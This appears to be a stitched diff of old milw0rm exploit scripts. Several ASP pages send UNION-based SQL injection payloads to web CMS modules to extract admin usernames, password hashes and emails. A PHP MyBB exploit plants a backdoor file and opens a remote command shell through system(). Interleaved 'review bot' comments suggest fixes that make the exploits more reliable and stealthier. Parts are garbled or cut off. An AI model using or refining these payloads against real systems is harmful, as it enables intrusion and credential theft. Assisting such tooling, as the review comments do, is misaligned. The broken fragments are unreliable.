+strHTML = objem.ResponseText
+
+header=objem.getallResponseheaders()
+Response.Write "
    " +Response.Write "" +Response.Write "

    Header Bilgileri

    " +Response.Write "
    " +Response.Write "

    " & header & "

    " +Response.Write "

    Whois

    " +Response.Write "

    Site:[google.com]

    " +Response.Write "
    " +Set objem=Nothing + +%> + +
    +

    + +

    +
    + + +
    + + +
    + +
    + + + + +
    + + + + +<% +End If +End If +End If +End If +End If + +%> + + +<% +If islem = "whois" Then +site = Request.Form("whoissite") +target1 = "http://reports.internic.net/cgi/whois?whois_nic=" & site & "&type=domain" + +Public Function take(come) +Set objtake = Server.CreateObject("Microsoft.XMLHTTP" ) +With objtake + .Open "GET" , come, FALSE + .sEnd +take = .Responsetext +End With +Set objtake = Nothing +End Function + +remoteadres=take(target1) + +dim baslangic , bitis +baslangic = "
    "
    +bitis = "
    " +dim x , abc +x = 0 +abc = 0 +dim sonuc +sonuc = "" + +Do Until abc = 2 +x = x + 1 +If Mid(remoteadres,x,Len(bitis)) = bitis and abc = 1 Then +abc = abc + 1 +End If +If Mid(remoteadres,x,Len(baslangic)) = baslangic Then +abc = abc + 1 +Else +If abc = 1 Then +sonuc = sonuc + Mid(remoteadres,x,1) +End If +End If +Loop + +Set objtake=Nothing + +%> + +
    +Whois Bilgileri

    + -
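Review bot: The target's raw response headers are written into the page unencoded: `header` comes from `objem.getallResponseheaders()` and goes straight into `Response.Write "..." & header & "..."`, so a hostile or honeypot target can return header values containing markup that runs in the operator's browser when this page is hosted on IIS. Use the encoder ASP already provides, `Server.HTMLEncode(header)` in that `Response.Write` (the `<%=basusername%>`-style outputs are less exposed because their regex character classes `[A-Za-z0-9ý]` / `[A-Za-z0-9@.]` already exclude markup). `On Error Resume Next` at the top of the file also means a failed `Server.CreateObject` or `calistir.Item(0)` yields silently empty values, so "Not True" is the only failure signal the operator ever sees. The file's diff header is not visible in this excerpt, so the hunk boundary is inferred from the content.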

    -
    - -
    -

    - -

    -
    - - - -<% -End If -%> - -<% -Response.Write "
    " -Response.Write "
    " -Response.Write "
    "
    -Response.Write ""
    -Response.Write "En iyi "
    -Response.Write ""
    -Response.Write ""
    -Response.Write "1152x864 "
    -Response.Write ""
    -Response.Write "çözünürlük ve "
    -Response.Write "Firefox "
    -Response.Write "ile görüntülünebilir.
    " - -Response.Write "
    "
    -Response.Write ""
    -Response.Write "Exploit coded by "
    -Response.Write ""
    -Response.Write ""
    -Response.Write "ajann"
    -Response.Write ""
    -Response.Write "
    " - -%> - -# milw0rm.com [2007-02-08] +<% Response.Buffer = True %> +<% On Error Resume Next %> +<% Server.ScriptTimeout = 100 %> + +<% +'=============================================================================================== +'[Script Name: LushiNews <= 1.01 (comments.php) Remote SQL Injection Exploit +'[Coded by : ajann +'[Author : ajann +'[Contact : :( +'[S.Page : http://www.lushi.de +'[ExploitName: exploit2.asp + +'[Note : exploit file name =>exploit2.asp +'[Update: + Get Header +'[Update: + Get Whois Info +'=============================================================================================== + +%> + +<% + +title="LushiNews <= 1.01 (comments.php) Remote SQL Injection Exploit" 'Vuln Title + +%> + +<% = title %> + + + + + + + + + +
    +<% = title %> +

    + + + + + + +
    + TARGET:Example:[http://x.com/path]

    + USER ID:Example:[User + ID=1]

    +
    +
    +
    +
    +
    + +
    + +<% +islem = Request.QueryString("islem") + +If islem = "hata1" Then +Response.Write "There is a problem! Please complete to the whole spaces" +End If + +If islem = "hata2" Then +Response.Write "There is a problem! Please right character use" +End If + +If islem = "hata3" Then +Response.Write "There is a problem! Add ""http://""" +End If + +If islem = "hata4" Then +Response.Write "There is a problem! Just Numeric Character!" +End If + +%> + +<% + +If islem = "get" Then + +id= Request.Form("id") + +file="comments.php?id=" +sql="-1%20union%20select%20concat(char" +sql1="(85,115,101,114,110,97,109,101,58),char(32)," +sql2="Name,char(32),char(80,97,115,115,119,111,114," +sql3="100,58),Passwort),0,0,0,concat(c" +sql4="har(109,109,97,105,108,58),mail)%20from%20" +sql5="members%20where%20ID=" +sql6=id + + +idform = Request.Form("id") +targettext = Request.Form("text1") +arama=InStr(1, targettext, "union" ,1) +arama2=InStr(1, targettext, "http://" ,1) + +If targettext="" Then +Response.Redirect("exploit2.asp?islem=hata1") + +Else +If arama>0 then +Response.Redirect("exploit2.asp?islem=hata2") + +Else +If arama2=0 then +Response.Redirect("exploit2.asp?islem=hata3") + +Else +IF Not IsNumeric(idform) Then +Response.Redirect("exploit2.asp?islem=hata4") + +Else +%> + +<% + +target1 = targettext+file+sql+sql1+sql2+sql3+sql4+sql5+sql6 + +Public Function take(come) +Set objtake = Server.CreateObject("Microsoft.XMLHTTP" ) +With objtake + .Open "GET" , come, FALSE + .sEnd + +take = .Responsetext +End With +SET objtake = Nothing +End Function + + +get_username = take(target1) + +getdata=InStr(get_username,"0 0/" ) +username=Mid(get_username,getdata+5,90) + +Dim metin +metin = take(target1) + +Dim objReg +Set objReg = New RegExp +objReg.Global = False +objReg.IgnoreCase = True + +objReg.Pattern = "Username: [A-Za-z0-9ý]+ Pass" +Dim calistir, istediginString +Set calistir = objReg.Execute(metin) + + +If calistir.Count = 0 Then + Response.write "Not True" +Else + basusername = 
Replace(calistir.Item(0), "Username: " , "" ) + basusername = Replace(basusername, " Pass" , "" ) + + + + objReg.Pattern = "Password:[A-Za-z0-9ý]+
    " + Set calistir = objReg.Execute(metin) + baspassword = Replace(calistir.Item(0), "Password:" , "" ) + baspassword = Replace(baspassword, "" , "" ) + + + objReg.Pattern = "mmail:[A-Za-z0-9@.]+" + Set calistir = objReg.Execute(metin) + basemail = Replace(calistir.Item(0), "mmail:" , "" ) + basemail = Replace(basemail, "" , "" ) + +End If + + + +Set bulunanlar = Nothing +Set objReg = Nothing + +%> + +
    + +ajann

    + + + + + + + + + + + + + + + + + +
            +      + Username:<%=basusername%>

    +
            +      + Password:<%=baspassword%>

    +
            +      + Email:<%=basemail%>

    +
    +
    + +
+
+
+<%
+hedef = targettext
+Dim objem
+Set objem = Server.CreateObject("MSXML2.ServerXMLHTTP")
+objem.Open "GET" , hedef , false
+
+objem.sEnd
+
+strHTML = objem.ResponseText
+
+header=objem.getallResponseheaders()
+Response.Write "
    " +Response.Write "" +Response.Write "

    Header Bilgileri

    " +Response.Write "
    " +Response.Write "

    " & header & "

    " +Response.Write "

    Whois

    " +Response.Write "

    Site:[google.com]

    " +Response.Write "
    " +Set objem=Nothing + +%> + +
    +

    + +

    +
    + + +
    + + +
    + +
    + + + + + + + + + +<% +End If +End If +End If +End If +End If + +%> + + +<% +If islem = "whois" Then +site = Request.Form("whoissite") +target1 = "http://reports.internic.net/cgi/whois?whois_nic=" & site & "&type=domain" + +Public Function take(come) +Set objtake = Server.CreateObject("Microsoft.XMLHTTP" ) +With objtake + .Open "GET" , come, FALSE + .sEnd +take = .Responsetext +End With +Set objtake = Nothing +End Function + +remoteadres=take(target1) + +dim baslangic , bitis +baslangic = "
    "
    +bitis = "
    " +dim x , abc +x = 0 +abc = 0 +dim sonuc +sonuc = "" + +Do Until abc = 2 +x = x + 1 +If Mid(remoteadres,x,Len(bitis)) = bitis and abc = 1 Then +abc = abc + 1 +End If +If Mid(remoteadres,x,Len(baslangic)) = baslangic Then +abc = abc + 1 +Else +If abc = 1 Then +sonuc = sonuc + Mid(remoteadres,x,1) +End If +End If +Loop + +Set objtake=Nothing + +%> + +
    +Whois Bilgileri

    + -
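Review bot: `baspassword` and `basemail` are read with `calistir.Item(0)` without first checking `calistir.Count`, and because the file opens with `On Error Resume Next` a non-matching pattern (`"Password:[A-Za-z0-9ý]+"` will not match a value with characters outside that class, and `"mmail:[A-Za-z0-9@.]+"` rejects addresses containing `-` or `_`) leaves the variable blank with no error, so the result table shows a username with an empty password and the operator cannot tell that extraction partially failed. Guard each lookup the way the username one already is: `If calistir.Count > 0 Then baspassword = Replace(calistir.Item(0), "Password:", "") End If`, and print an explicit "pattern did not match" message otherwise. Separately, `get_username = take(target1)` and `metin = take(target1)` send the injection request to the target twice per run while `get_username`/`username` are never used afterwards; `metin = get_username` halves the footprint in the target's logs. The file's diff header is not visible here, so the hunk boundary is inferred from the content.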

    -
    - -
    -

    - -

    -
    - - - -<% -End If -%> - -<% -Response.Write "
    " -Response.Write "
    " -Response.Write "
    "
    -Response.Write ""
    -Response.Write "En iyi "
    -Response.Write ""
    -Response.Write ""
    -Response.Write "1152x864 "
    -Response.Write ""
    -Response.Write "çözünürlük ve "
    -Response.Write "Firefox "
    -Response.Write "ile görüntülünebilir.
    " - -Response.Write "
    "
    -Response.Write ""
    -Response.Write "Exploit coded by "
    -Response.Write ""
    -Response.Write ""
    -Response.Write "ajann"
    -Response.Write ""
    -Response.Write "
    " - -%> - -# milw0rm.com [2007-02-08] +<% Response.Buffer = True %> +<% On Error Resume Next %> +<% Server.ScriptTimeout = 100 %> + +<% +'=============================================================================================== +'[Script Name: LushiWarPlaner 1.0 (register.php) Remote SQL Injection Exploit +'[Coded by : ajann +'[Author : ajann +'[Contact : :( +'[S.Page : http://www.lushi.de +'[ExploitName: exploit2.asp + +'[Note : exploit file name =>exploit2.asp +'[Update: + Get Header +'[Update: + Get Whois Info +'=============================================================================================== + +%> + +<% + +title="LushiWarPlaner 1.0 (register.php) Remote SQL Injection Exploit" 'Vuln Title + +%> + +<% = title %> + + + + + + + + + +
    +<% = title %> +

    + + + + + + +
    + TARGET:Example:[http://x.com/path]

    + USER ID:Example:[User + ID=1]

    +
    +
    +
    +
    +
    + +
    + +<% +islem = Request.QueryString("islem") + +If islem = "hata1" Then +Response.Write "There is a problem! Please complete to the whole spaces" +End If + +If islem = "hata2" Then +Response.Write "There is a problem! Please right character use" +End If + +If islem = "hata3" Then +Response.Write "There is a problem! Add ""http://""" +End If + +If islem = "hata4" Then +Response.Write "There is a problem! Just Numeric Character!" +End If + +%> + +<% + +If islem = "get" Then + +id= Request.Form("id") + +file="register.php?id=" +sql="-1%20union%20select%200,mail,2,3,4,5,6," +sql1="concat(char(85,115,101,114,110,97," +sql2="109,101,58),char(32),Name,c" +sql3="har(32),char(80,97,115,115,119,11" +sql4="1,114,100,58),Passwort),8,9%20fr" +sql5="om%20members%20where%20id=" +sql6=id + + +idform = Request.Form("id") +targettext = Request.Form("text1") +arama=InStr(1, targettext, "union" ,1) +arama2=InStr(1, targettext, "http://" ,1) + +If targettext="" Then +Response.Redirect("exploit2.asp?islem=hata1") + +Else +If arama>0 then +Response.Redirect("exploit2.asp?islem=hata2") + +Else +If arama2=0 then +Response.Redirect("exploit2.asp?islem=hata3") + +Else +IF Not IsNumeric(idform) Then +Response.Redirect("exploit2.asp?islem=hata4") + +Else +%> + +<% + +target1 = targettext+file+sql+sql1+sql2+sql3+sql4+sql5+sql6 + +Public Function take(come) +Set objtake = Server.CreateObject("Microsoft.XMLHTTP" ) +With objtake + .Open "GET" , come, FALSE + .sEnd + +take = .Responsetext +End With +SET objtake = Nothing +End Function + + +get_username = take(target1) + +getdata=InStr(get_username,"0 0/" ) +username=Mid(get_username,getdata+5,90) + +Dim metin +metin = take(target1) + +Dim objReg +Set objReg = New RegExp +objReg.Global = False +objReg.IgnoreCase = True + +objReg.Pattern = "Username: [A-Za-z0-9ý]+ Pass" +Dim calistir, istediginString +Set calistir = objReg.Execute(metin) + + +If calistir.Count = 0 Then + Response.write "Not True" +Else + basusername = Replace(calistir.Item(0), 
"Username: " , "" ) + basusername = Replace(basusername, " Pass" , "" ) + + + + objReg.Pattern = "Password:[A-Za-z0-9ý]+" + Set calistir = objReg.Execute(metin) + baspassword = Replace(calistir.Item(0), "Password:" , "" ) + baspassword = Replace(baspassword, "" , "" ) + + + objReg.Pattern = "target=""_blank"" title=""0"">[A-Za-z0-9@.]+" + Set calistir = objReg.Execute(metin) + basemail = Replace(calistir.Item(0), "target=""_blank"" title=""0"">" , "" ) + basemail = Replace(basemail, "" , "" ) + +End If + + + +Set bulunanlar = Nothing +Set objReg = Nothing + +%> + +
    + +ajann

    + + + + + + + + + + + + + + + + + +
            +      + Username:<%=basusername%>

    +
            +      + Password:<%=baspassword%>

    +
            +      + Email:<%=basemail%>

    +
    +
    + +
+
+
+<%
+hedef = targettext
+Dim objem
+Set objem = Server.CreateObject("MSXML2.ServerXMLHTTP")
+objem.Open "GET" , hedef , false
+
+objem.sEnd
+
+strHTML = objem.ResponseText
+
+header=objem.getallResponseheaders()
+Response.Write "
    " +Response.Write "" +Response.Write "

    Header Bilgileri

    " +Response.Write "
    " +Response.Write "

    " & header & "

    " +Response.Write "

    Whois

    " +Response.Write "

    Site:[google.com]

    " +Response.Write "
    " +Set objem=Nothing + +%> + +
    +

    + +

    +
    + + +
    + + +
    + +
    + + + + + + + + + +<% +End If +End If +End If +End If +End If + +%> + + +<% +If islem = "whois" Then +site = Request.Form("whoissite") +target1 = "http://reports.internic.net/cgi/whois?whois_nic=" & site & "&type=domain" + +Public Function take(come) +Set objtake = Server.CreateObject("Microsoft.XMLHTTP" ) +With objtake + .Open "GET" , come, FALSE + .sEnd +take = .Responsetext +End With +Set objtake = Nothing +End Function + +remoteadres=take(target1) + +dim baslangic , bitis +baslangic = "
    "
    +bitis = "
    " +dim x , abc +x = 0 +abc = 0 +dim sonuc +sonuc = "" + +Do Until abc = 2 +x = x + 1 +If Mid(remoteadres,x,Len(bitis)) = bitis and abc = 1 Then +abc = abc + 1 +End If +If Mid(remoteadres,x,Len(baslangic)) = baslangic Then +abc = abc + 1 +Else +If abc = 1 Then +sonuc = sonuc + Mid(remoteadres,x,1) +End If +End If +Loop + +Set objtake=Nothing + +%> + +
    +Whois Bilgileri

    + -
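Review bot: The target URL is only checked for the substring `http://` (`arama2=InStr(1, targettext, "http://" ,1)` then `If arama2=0`) and the absence of `union`, and is then used verbatim in `objem.Open "GET" , hedef , false` and `take(target1)`, so once exploit2.asp is hosted on an IIS box anyone who can reach it can make that server fetch arbitrary URLs, internal addresses included, and read the headers and body back. The `union` blacklist protects nothing, since the script appends its own UNION payload in `sql`..`sql6`. If the page is to be exposed at all, at least require the scheme as a prefix, `If LCase(Left(targettext, 7)) <> "http://" Then Response.Redirect("exploit2.asp?islem=hata3")`, and URL-encode the whois input, which is concatenated raw into the internic query: `... & Server.URLEncode(site) & "&type=domain"`. The file's diff header is not visible in this excerpt, so the hunk boundary is inferred from the content.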

    -
    - -
    -

    - -

    -
    - - - -<% -End If -%> - -<% -Response.Write "
    " -Response.Write "
    " -Response.Write "
    "
    -Response.Write ""
    -Response.Write "En iyi "
    -Response.Write ""
    -Response.Write ""
    -Response.Write "1152x864 "
    -Response.Write ""
    -Response.Write "çözünürlük ve "
    -Response.Write "Firefox "
    -Response.Write "ile görüntülünebilir.
    " - -Response.Write "
    "
    -Response.Write ""
    -Response.Write "Exploit coded by "
    -Response.Write ""
    -Response.Write ""
    -Response.Write "ajann"
    -Response.Write ""
    -Response.Write "
    " - -%> - -# milw0rm.com [2007-02-19] +<% Response.Buffer = True %> +<% On Error Resume Next %> +<% Server.ScriptTimeout = 100 %> + +<% +'=============================================================================================== +'[Script Name: Php-Nuke Module Emporium <= 2.3.0 Remote Blind SQL Injection Exploit +'[Coded by : ajann +'[Author : ajann +'[Contact : :( +'[S.Page : http://www.burnwave.com/ +'[ExploitName: exploit2.asp + +'[Note : exploit file name =>exploit2.asp +'[Update: + Get Header +'[Update: + Get Whois Info +'=============================================================================================== + +%> + +<% + +title="Php-Nuke Module Emporium <= 2.3.0 Remote Blind SQL Injection Exploit" 'Vuln Title + +%> + +<% = title %> + + + + + + + + + +
    +<% = title %> +

    + + + + + + +
    + TARGET:Example:[http://x.com/path]

    + USER ID:Example:[User + ID=1]

    +
    +
    +
    +
    +
    + +
    + +<% +islem = Request.QueryString("islem") + +If islem = "hata1" Then +Response.Write "There is a problem! Please complete to the whole spaces" +End If + +If islem = "hata2" Then +Response.Write "There is a problem! Please right character use" +End If + +If islem = "hata3" Then +Response.Write "There is a problem! Add ""http://""" +End If + +If islem = "hata4" Then +Response.Write "There is a problem! Just Numeric Character!" +End If + +%> + +<% + +If islem = "get" Then + +id= Request.Form("id") + +file="modules.php?name=Shopping_Cart&file=category&category_id=" +sql="1/1%20union%20select%200,pwd,0%20from%20nuke_authors%20where%20radminsuper=1/*" + + +idform = Request.Form("id") +targettext = Request.Form("text1") +arama=InStr(1, targettext, "union" ,1) +arama2=InStr(1, targettext, "http://" ,1) + +If targettext="" Then +Response.Redirect("exploit2.asp?islem=hata1") + +Else +If arama>0 then +Response.Redirect("exploit2.asp?islem=hata2") + +Else +If arama2=0 then +Response.Redirect("exploit2.asp?islem=hata3") + +Else +IF Not IsNumeric(idform) Then +Response.Redirect("exploit2.asp?islem=hata4") + +Else +%> + +<% + +target1 = targettext+file+sql + +Public Function take(come) +Set objtake = Server.CreateObject("Microsoft.XMLHTTP" ) +With objtake + .Open "GET" , come, FALSE + .sEnd + +take = .Responsetext +End With +SET objtake = Nothing +End Function + + +get_username = take(target1) + +getdata=InStr(get_username,"0 0/" ) +username=Mid(get_username,getdata+5,90) + +Dim metin +metin = take(target1) + +Dim objReg +Set objReg = New RegExp +objReg.Global = True +objReg.IgnoreCase = True + +objReg.Pattern = "0"">[A-Za-z0-9ý]+" +Dim calistir, istediginString +Set calistir = objReg.Execute(metin) + + +If calistir.Count = 0 Then + Response.write "Not True" +Else + basusername = Replace(calistir.Item(0), "0"">" , "" ) + basusername = Replace(basusername, "" , "" ) + + +End If + + + +Set bulunanlar = Nothing +Set objReg = Nothing + +%> + +
    + +ajann

    + + + + + + + + +
            +      + Password Admin:<%=basusername%>

    +
    +
    + +
+
+
+<%
+hedef = targettext
+Dim objem
+Set objem = Server.CreateObject("MSXML2.ServerXMLHTTP")
+objem.Open "GET" , hedef , false
+
+objem.sEnd
+
+strHTML = objem.ResponseText
+
+header=objem.getallResponseheaders()
+Response.Write "
    " +Response.Write "" +Response.Write "

    Header Bilgileri

    " +Response.Write "
    " +Response.Write "

    " & header & "

    " +Response.Write "

    Whois

    " +Response.Write "

    Site:[google.com]

    " +Response.Write "
    " +Set objem=Nothing + +%> + +
    +

    + +

    +
    + + +
    + + +
    + +
    + + + + + + + + + +<% +End If +End If +End If +End If +End If + +%> + + +<% +If islem = "whois" Then +site = Request.Form("whoissite") +target1 = "http://reports.internic.net/cgi/whois?whois_nic=" & site & "&type=domain" + +Public Function take(come) +Set objtake = Server.CreateObject("Microsoft.XMLHTTP" ) +With objtake + .Open "GET" , come, FALSE + .sEnd +take = .Responsetext +End With +Set objtake = Nothing +End Function + +remoteadres=take(target1) + +dim baslangic , bitis +baslangic = "
    "
    +bitis = "
    " +dim x , abc +x = 0 +abc = 0 +dim sonuc +sonuc = "" + +Do Until abc = 2 +x = x + 1 +If Mid(remoteadres,x,Len(bitis)) = bitis and abc = 1 Then +abc = abc + 1 +End If +If Mid(remoteadres,x,Len(baslangic)) = baslangic Then +abc = abc + 1 +Else +If abc = 1 Then +sonuc = sonuc + Mid(remoteadres,x,1) +End If +End If +Loop + +Set objtake=Nothing + +%> + +
    +Whois Bilgileri

    + - - - - - -
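Review bot: The `USER ID` the form collects is validated (`IF Not IsNumeric(idform)`) but never used — `target1 = targettext+file+sql` with `sql` hard-coded to `category_id=1/1 union select 0,pwd,0 from nuke_authors where radminsuper=1/*` — so the field only misleads the operator, and the query also assumes the default `nuke_` table prefix, meaning an install with a custom prefix prints the same "Not True" as a non-vulnerable target. State both in the header comment, e.g. `'[Note : USER ID is ignored; query targets nuke_authors (default prefix) and returns the first super-admin hash`, or drop the input. `objReg.Global = True` collects every match but only `calistir.Item(0)` is printed, so if more than one `radminsuper=1` row exists the rest are silently dropped; iterate `For Each m In calistir` if all admins are wanted. The title calls this a blind injection while the payload reads `pwd` directly from the UNION output via `objReg.Pattern = "0"">[A-Za-z0-9ý]+"`, which looks like a misnomer rather than a bug but is worth confirming against the original advisory. The diff header for this file is not in the excerpt, so the hunk boundary is inferred from the content.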

    - - -# milw0rm.com [2007-03-14] + + +--======Dj7xpl======-- + +
    +
    + +

    + your script:
    +
    -

    - -ajann

    -

    -
    - - - - - -# milw0rm.com [2007-03-27] + + +Joomla Component D4JeZine <= 2.8 Remote BLIND SQL Injection Exploit + + + + + + + +
    + +

    Joomla Component D4JeZine <= 2.8 Remote BLIND SQL Injection Exploit

    + +

    + Target:[http://[target]/ +               +

    +
    +  Path:[http://[target]/[scriptpath]    + +

    +  Character:[Md5 + Character 1-32]   + +

    +

    +  Article ID[Article + ID Numeric]        + +

    +

    +
    +
    -

    - -ajann

    -

    -
    - - - - - -# milw0rm.com [2007-03-31] + + +XOOPS Module Lykos Reviews 1.00 (index.php) BLIND SQL Injection Exploit + + + + + + + +
    + +

    XOOPS Module Lykos Reviews 1.00 (index.php) BLIND SQL Injection Exploit

    + +

    + Target:[http://[target]/ +               +

    +
    +  Path:[http://[target]/[scriptpath]    + +

    +  Character:[Md5 + Character 1-32]   + +

    +

    +
    +
    -

    - -ajann

    -

    -
    - - - - - -# milw0rm.com [2007-04-01] + + +XOOPS Module debaser <= 0.92(genre.php) BLIND SQL Injection Exploit + + + + + + + +
    + +

    XOOPS Module debaser <= 0.92(genre.php) BLIND SQL Injection Exploit

    + +

    + Target:[http://[target]/ +               +

    +
    +  Path:[http://[target]/[scriptpath]    + +

    +  Character:[Md5 + Character 1-32]   + +

    +

    + Genre Id:[genre.php?genreid=]   + +

    +

    +
    +
    -

    - -ajann

    -

    -
    - - - - - -# milw0rm.com [2007-04-02] + + +XOOPS Module XFsection <= 1.07 (articleid) BLIND SQL Injection Exploit + + + + + + + +
    + +

    XOOPS Module XFsection <= 1.07 (articleid) BLIND SQL Injection Exploit

    + +

    + Target:[http://[target]/ +               +

    +
    +  Path:[http://[target]/[scriptpath]    + +

    +  Character:[Md5 + Character 1-32]   + +

    +

    + Article Id:[print.php?articleid=]   + +

    +

    +
    +#',$xpl->getcontent(),$name_value); - -# We can't use: -# - -# - ' OR " -# -$PHPCODE = '${${error_reporting(0)}}' - .'${${$handle=fopen('.chrit('./'.$backdoor).','.chrit('w').')}}' - .'${${fwrite($handle,'.chrit('').')}}' - .'${${fclose($handle)}}'; -$name_value[2][0] .= $PHPCODE; - -$postdata=array(frmdt_url => $url.'admin/languages.php', - "adminsid" => $sid, "action" => "do_edit", - "lang" => $lang, "editwith" => 0, - "inadmin"=> 0, "file"=> $filetoed, - "Update Language Variables"=>" Update Language Variables"); - -for($i=0;$ishowlastrequest(); -$xpl->formdata($postdata); - -# Trying to execute the php code -$xpl->get($url.'index.php'); - -# If not the default language -$xpl->get($url.'inc/languages/'.$lang.'/'.$filetoed); -print "\nThe php file should be created\n\$shell> "; - -# Hello master -while(!preg_match("#^(quit|exit)$#",($cmd = trim(fgets(STDIN))))) -{ - # ');include('../../inc/config.php');print $config['password'];// - $xpl->addheader('Shell',"system('$cmd');"); - $xpl->get($url.$backdoor); - print $xpl->getcontent()."\n\$shell> "; -} - -function sql_inject($field) -{ - global $xpl,$url,$prefix,$debug,$result,$bef,$aft,$truetime,$benchmark,$a,$b,$sub,$f; #,$fakeip - $sub=0;$string=''; - - if($field=='ip') {$a='44';$b='57';} # . 0-9 - else {$a='46';$b='70';} # 0-9 A-Z - - while(TRUE) - { - $sub++; - for($i=$a;$i<=$b;$i++) - { - # Random ip - $fakeip = rand(128,254).'.' - .rand(128,254).'.' - .rand(128,254).'.' - .rand(128,254); - - # Calculation of the server response time which returns TRUE - if($i==$a) $f='TST'; - - # End of the string ? - elseif($i==($a+1)) $f='NULL'; - - # Test the char - else $f=$i; - - # Table prefix - if($sub==1 AND $i==$a) - { - $xpl->addheader('Client-IP',$fakeip."'"); - $xpl->get($url.'index.php'); - - if(preg_match("#DELETE FROM (\S*)sessions#i",$xpl->getcontent(),$match)) $prefix=$match[1]; - else $prefix='mybb_'; - } - - # +-class_session.php (#2) - # | - # 475. function create_session($uid=0) - # 476. { - # 477. 
global $db; - # 478. $speciallocs = $this->get_special_locations(); - # 479. - # 480. // If there is a proper uid, delete by uid. - # 481. if($uid > 0) - # 482. { - # 483. $db->delete_query(TABLE_PREFIX."sessions", "uid=".$uid); - # 484. $onlinedata['uid'] = $uid; - # 485. } - # 486. // Else delete by ip. - # 487. else - # 488. { // $this->ipaddress = get_ip(); - # 489. $db->delete_query(TABLE_PREFIX."sessions", "ip='".$this->ipaddress."'"); - # 490. $onlinedata['uid'] = 0; - # 491. } - # - $sql = $fakeip."' OR ip=(SELECT IF(SUBSTR("; - $sql .= ($f=='TST') ? "(SELECT 1)" : "(SELECT $field FROM ${prefix}adminsessions ORDER BY lastactive DESC LIMIT 1)"; - $sql .= ($f=='TST') ? ",1" : ",$sub"; - $sql .= ($f=='TST') ? ",1)=CHAR(49)" : ",1)=CHAR($f)"; - $sql .= ",BENCHMARK($benchmark,CHAR(66)),1)) #"; - - - # +-functions.php (#1) - # | - # 1836. function get_ip() - # 1837. { - # 1838. if(isset($_SERVER['HTTP_X_FORWARDED_FOR'])) - # 1839. { - # 1840. if(preg_match_all("#[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}#s", $_SERVER['HTTP_X_FORWARDED_FOR'], $addresses)) - # 1841. { - # 1842. foreach($addresses[0] as $key => $val) - # 1843. { - # 1844. if(!preg_match("#^(10|172\.16|192\.168)\.#", $val)) - # 1845. { - # 1846. $ip = $val; - # 1847. break; - # 1848. } - # 1849. } - # 1850. } - # 1851. } - # 1852. if(!isset($ip)) - # 1853. { - # 1854. if(isset($_SERVER['HTTP_CLIENT_IP'])) - # 1855. { - # 1856. $ip = $_SERVER['HTTP_CLIENT_IP']; - # 1857. } - # 1858. else - # 1859. { - # 1860. $ip = $_SERVER['REMOTE_ADDR']; - # 1861. } - # 1862. } - # 1863. return $ip; - # 1864. } - # - $bef = time(); - $xpl->reset('header'); - $xpl->addheader('Client-IP',$sql); - $xpl->get($url.'index.php'); - $aft = time(); - - if($f=='TST') $truetime=$aft-$bef; - if(getparam('truetime')!='') $truetime=getparam('truetime'); - - # Server response time >= Server response time which returns TRUE ? 
- $restime = $aft-$bef; - if($restime >= $truetime AND $f != 'TST') $result='TRUE'; - else $result='FALSE'; - - # Debug mode activated - if($debug) debug('',$field); - - # The tested char returns TRUE - if($result=='TRUE') - { - if($f!='NULL') - { - # Continue - print strtolower(chr($f)); - $string .= chr($f); - break; - } - else - { - # End of the string - $xpl->reset('header'); - return $string; - } - } - - # Retry if no char found - if($f==$b) $sub--; - } - } -} - -function debug($init='',$dafield='') -{ - global $result,$bef,$aft,$truetime,$benchmark,$a,$b,$sub,$f; #,$fakeip - if($init) - { - $handle = fopen("debug_mybb.html","w+"); - $data = "

    MyBulletinBoard (MyBB) <= 1.2.3 Code Execution Exploit

    -
    
    -		
    -		
    -		
    -		
    -		";
    -		# 
    -		$data .= "
    -		
    -		
    -		
    -		";
    -		fwrite($handle,$data);
    -		fclose($handle);
    -	}
    -	else
    -	{
    -		$handle = fopen("debug_mybb.html","a");
    -		$data   = "
    -		
    -		
    -		
    -		
    -		";
    -		# 
    -		$data .= "
    -		
    -		
    -		
    -		";
    -		fwrite($handle,$data);
    -		fclose($handle);
    -	}
    -}
    -
    -function chrit($string)
    -{
    -	$char = '';
    -	for($i=0;$i $key)
    -	{
    -		if($key == '-'.$param) {
    -		   if(!empty($argv[$value+1])) return $argv[$value+1];
    -		   else return 1;
    -		}
    -	}
    -	if($opt) exit("\n-$param parameter required");
    -	else return;
    -}
    -
    -/*
    - * 
    - * Copyright (C) darkfig
    - * 
    - * This program is free software; you can redistribute it and/or 
    - * modify it under the terms of the GNU General Public License 
    - * as published by the Free Software Foundation; either version 2 
    - * of the License, or (at your option) any later version. 
    - * 
    - * This program is distributed in the hope that it will be useful, 
    - * but WITHOUT ANY WARRANTY; without even the implied warranty of 
    - * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the 
    - * GNU General Public License for more details. 
    - * 
    - * You should have received a copy of the GNU General Public License 
    - * along with this program; if not, write to the Free Software 
    - * Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA  02111-1307, USA.
    - * 
    - * TITLE:          PhpSploit Class
    - * REQUIREMENTS:   PHP 5 (remove "private", "public" if you have PHP 4)
    - * VERSION:        1.2
    - * LICENSE:        GNU General Public License
    - * ORIGINAL URL:   http://www.acid-root.new.fr/tools/03061230.txt
    - * FILENAME:       phpsploitclass.php
    - *
    - * CONTACT:        gmdarkfig@gmail.com (french / english)
    - * GREETZ:         Sparah, Ddx39
    - *
    - * DESCRIPTION:
    - * The phpsploit is a class implementing a web user agent.
    - * You can add cookies, headers, use a proxy server with (or without) a
    - * basic authentification. It supports the GET and the POST method. It can
    - * also be used like a browser with the cookiejar() function (which allow
    - * a server to add several cookies for the next requests) and the
    - * allowredirection() function (which allow the script to follow all
    - * redirections sent by the server). It can return the content (or the
    - * headers) of the request. Others useful functions can be used for debugging.
    - * A manual is actually in development but to know how to use it, you can
    - * read the comments.
    - *
    - * CHANGELOG:
    - * [2007-01-24] (1.2)
    - *  * Bug #2 fixed: Problem concerning the getcookie() function ((|;))
    - *  * New: multipart/form-data enctype is now supported 
    - *
    - * [2006-12-31] (1.1)
    - *  * Bug #1 fixed: Problem concerning the allowredirection() function (chr(13) bug)
    - *  * New: You can now call the getheader() / getcontent() function without parameters
    - *
    - * [2006-12-30] (1.0)
    - *  * First version
    - * 
    - */
    -
    -class phpsploit {
    -
    -	/**
    -	 * This function is called by the get()/post() functions.
    -	 * You don't have to call it, this is the main function.
    -	 *
    -	 * @return $server_response
    -	 */
    -	private function sock()
    -	{
    -		if(!empty($this->proxyhost) && !empty($this->proxyport)) $socket = fsockopen($this->proxyhost,$this->proxyport);
    -		else $socket = fsockopen($this->host,$this->port);
    -		
    -		if(!$socket) die("Error: The host doesn't exist");
    -		
